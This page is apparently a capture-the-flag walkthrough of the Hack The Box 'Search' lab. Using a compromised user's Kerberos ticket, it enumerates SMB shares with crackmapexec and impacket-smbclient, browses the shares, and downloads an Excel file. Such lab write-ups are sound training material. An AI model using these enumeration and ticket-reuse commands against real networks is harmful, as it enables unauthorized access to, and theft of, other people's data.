InfoSec LAB

Search_smb_edgar.jacobs

Created: 2 min read

edgar.jacobs Session

Checking for SMB access level of the edgar.jacobs user after compromising the account

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=edgar.jacobs@research.search.htb.ccache crackmapexec smb research.search.htb -k --use-kcache --kdcHost research.search.htb --shares
smb         research.search.htb 445    research         [*] windows 10.0 build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         research.search.htb 445    RESEARCH         [+] search.htb\ from ccache 
SMB         research.search.htb 445    RESEARCH         [+] Enumerated shares
SMB         research.search.htb 445    RESEARCH         Share           Permissions     Remark
SMB         research.search.htb 445    RESEARCH         -----           -----------     ------
SMB         research.search.htb 445    RESEARCH         ADMIN$                          Remote Admin
SMB         research.search.htb 445    RESEARCH         C$                              Default share
SMB         research.search.htb 445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         research.search.htb 445    RESEARCH         helpdesk        READ            
SMB         research.search.htb 445    RESEARCH         IPC$            READ            Remote IPC
SMB         research.search.htb 445    RESEARCH         NETLOGON        READ            Logon server share 
SMB         research.search.htb 445    RESEARCH         RedirectedFolders$ READ,WRITE      
SMB         research.search.htb 445    RESEARCH         SYSVOL          READ            Logon server share

As I have speculated previously, the edgar.jacobs user with a membership to the HelpDesk group does have access to the //research.search.htb/helpdesk share

//research.search.htb/helpdesk Share

┌──(kali㉿kali)-[~/…/htb/labs/search/smb]
└─$ KRB5CCNAME=../edgar.jacobs@research.search.htb.ccache impacket-smbclient SEARCH.HTB/@research.search.htb -k -no-pass -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
Type help for list of commands
# use helpdesk
# ls
drw-rw-rw-          0  Tue Apr 14 12:24:23 2020 .
drw-rw-rw-          0  Tue Apr 14 12:24:23 2020 ..

While I did expect to find something here, but it’s empty

//research.search.htb/RedirectedFolders$ Share

# use RedirectedFolders$
# cd edgar.jacobs
# tree .
/edgar.jacobs/Desktop/$RECYCLE.BIN
/edgar.jacobs/Desktop/desktop.ini
/edgar.jacobs/Desktop/Microsoft Edge.lnk
/edgar.jacobs/Desktop/Phishing_Attempt.xlsx
/edgar.jacobs/Documents/$RECYCLE.BIN
/edgar.jacobs/Documents/desktop.ini
/edgar.jacobs/Downloads/$RECYCLE.BIN
/edgar.jacobs/Downloads/desktop.ini
/edgar.jacobs/Desktop/$RECYCLE.BIN/desktop.ini
/edgar.jacobs/Documents/$RECYCLE.BIN/desktop.ini
/edgar.jacobs/Downloads/$RECYCLE.BIN/desktop.ini
Finished - 14 files and folders

However, there is an interesting Excel file in the home directory of the edgar.jacobs user

# get /edgar.jacobs/Desktop/Phishing_Attempt.xlsx

I will download it to Kali and review it further

Interactive Graph View

Backlinks